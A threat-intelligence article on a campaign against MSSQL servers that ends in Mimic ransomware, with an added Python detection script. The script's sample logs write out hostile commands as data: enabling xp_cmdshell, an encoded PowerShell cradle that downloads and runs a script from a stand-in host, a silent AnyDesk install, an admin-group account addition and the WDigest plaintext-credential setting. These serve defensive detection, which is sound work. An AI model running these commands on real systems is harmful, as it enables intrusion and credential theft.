Turkish Hackers' RE#TURGENCE Campaign Hits MSSQL Servers and Paves a Path to Ransomware
In an ongoing threat campaign, Turkish hackers are deploying Mimic ransomware payloads against organizations in the United States, European Union, and Latin America. Codenamed RE#TURGENCE by the Securonix Threat Research team, this campaign specifically targets vulnerable MSSQL servers. Driven by financial gain, these Turkish threat actors exhibit sophisticated techniques to access and exploit database servers. Securonix's investigation of the intrusions found that the campaign tends to "end in one of two ways, either the selling of “access” to the compromised host, or the ultimate delivery of ransomware payloads."
The attacker's initial breach is achieved through brute-forcing MSSQL administrative passwords. Once inside, the attackers use the xp_cmdshell procedure to run malicious commands through a command shell. The intrusion unfolds through a multi-stage process: execution of encoded PowerShell commands to fetch and run further scripts from remote servers; deployment of the Cobalt Strike payload using evasion techniques; and installation of AnyDesk for direct control. A batch script was used to silently install the AnyDesk service, create a user account, and add that account to the administrators group.
To gather credentials, the attackers added a registry entry that enables WDigest credential caching, allowing plaintext passwords to be stored in memory, from which they are then extracted using tools like Mimikatz. Discovery activities involve scanning the network with the Advanced Port Scanner tool and gathering additional domain and host details. The context gathered from discovery efforts, together with the stolen credentials, facilitated lateral movement across the network using PsExec. The culmination of the attack is the execution of Mimic ransomware, leading to data encryption and ransom extortion. Securonix's report also gives insights into OPSEC blunders by the threat actors, revealing chat communication, Amazon EC2 instance names, and an AnyDesk password.
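Securonix's report carries its own detection guidance; the Python below is an added example written for this page, not code from the Securonix report or from BleepingComputer. It shows how the TTPs described in the two paragraphs above (xp_cmdshell being enabled and executed, a shell spawned by the SQL Server process, an encoded PowerShell command, a silent AnyDesk install with an account added to Administrators, the WDigest registry change, and PsExec service execution) can be surfaced from simplified log records. The `kind key=value` log format, the host name `db01`, the account `svc_backup`, the download URL on the reserved `example.invalid` domain and the records themselves are all constructed for the example; the `UseLogonCredential` value under `HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest` is the well-known setting the article refers to without naming it (`1` is the weak setting, `0` the hardened one).

```python
import base64
import re
from dataclasses import dataclass

# Encoded PowerShell is base64 over UTF-16LE. This builds a constructed,
# harmless cradle pointing at a reserved .invalid domain for the sample log.
ENCODED_CRADLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')".encode("utf-16-le")
).decode("ascii")

# Constructed sample records (not taken from the report): one line per event,
# "kind key=value ..." with quoted values where they contain spaces.
SAMPLE_LOGS = [
    '''sql_audit host=db01 login=sa stmt="EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE"''',
    '''sql_audit host=db01 login=sa stmt="EXEC master..xp_cmdshell 'whoami'"''',
    f'proc_create host=db01 parent=sqlservr.exe image=powershell.exe cmdline="powershell.exe -NoP -W Hidden -enc {ENCODED_CRADLE}"',
    r'registry_set host=db01 key="HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" value=UseLogonCredential data=1',
    r'proc_create host=db01 parent=cmd.exe image=AnyDesk.exe cmdline="AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"',
    'proc_create host=db01 parent=cmd.exe image=net.exe cmdline="net localgroup administrators svc_backup /add"',
    'proc_create host=db01 parent=services.exe image=PSEXESVC.exe cmdline="PSEXESVC.exe"',
    'proc_create host=db01 parent=services.exe image=sqlservr.exe cmdline="sqlservr.exe -sMSSQLSERVER"',  # benign
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
WDIGEST_KEY = r"securityproviders\wdigest"  # lower-cased suffix of the registry key


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


def parse_record(line):
    """Split 'kind key=value ...' into a dict; quoted values keep their spaces."""
    kind, _, rest = line.partition(" ")
    rec = {"kind": kind}
    for key, quoted, bare in FIELD_RE.findall(rest):
        rec[key] = quoted if quoted else bare
    return rec


def decode_encoded_powershell(cmdline):
    """Return the decoded script if the command line carries a -e/-ec/-enc/-EncodedCommand payload."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(lines):
    """Run the RE#TURGENCE-style rules over log lines and return the findings in order."""
    findings = []
    for line in lines:
        r = parse_record(line)
        host, kind = r.get("host", "?"), r["kind"]
        if kind == "sql_audit":
            stmt = r.get("stmt", "")
            if re.search(r"\bxp_cmdshell\b", stmt, re.IGNORECASE):
                rule = "xp_cmdshell enabled via sp_configure" if "sp_configure" in stmt.lower() else "xp_cmdshell executed"
                findings.append(Finding(host, rule, stmt))
        elif kind == "proc_create":
            image, parent = r.get("image", "").lower(), r.get("parent", "").lower()
            cmd = r.get("cmdline", "")
            if parent == "sqlservr.exe" and image in SHELLS:
                findings.append(Finding(host, "shell spawned by SQL Server", cmd))
            decoded = decode_encoded_powershell(cmd)
            if decoded is not None:
                findings.append(Finding(host, "encoded PowerShell command", decoded))
            if image == "anydesk.exe" and "--install" in cmd and "--silent" in cmd:
                findings.append(Finding(host, "silent AnyDesk install", cmd))
            if image == "net.exe" and re.search(r"localgroup\s+administrators\s+\S+\s+/add", cmd, re.IGNORECASE):
                findings.append(Finding(host, "account added to local Administrators", cmd))
            if image.startswith("psexesvc") or image.startswith("psexec"):
                findings.append(Finding(host, "PsExec service execution", cmd))
        elif kind == "registry_set":
            # data=1 enables plaintext caching; data=0 is the hardened setting and is not flagged.
            if (r.get("key", "").lower().endswith(WDIGEST_KEY)
                    and r.get("value", "").lower() == "uselogoncredential"
                    and r.get("data") == "1"):
                findings.append(Finding(host, "WDigest plaintext credential caching enabled",
                                        f"{r['key']}\\{r['value']} = {r['data']}"))
    return findings


def run_sample():
    return analyse(SAMPLE_LOGS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"[{f.host}] {f.rule}: {f.detail[:80]}")
```

The decoded PowerShell is kept in the finding's `detail` so an analyst sees the cradle rather than the base64 blob, and the benign `sqlservr.exe` start at the end of the sample produces no finding, which is the negative case any such rule set should be checked against.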
Further investigations by BleepingComputer revealed connections linking the threat actors to Phobos ransomware incidents, evidenced by the use of the email address datenklause0@gmail[.]com in the ransom note. The detection guidance in Securonix's report offers a comprehensive look at the RE#TURGENCE campaign and valuable insight into the threat actor's TTPs.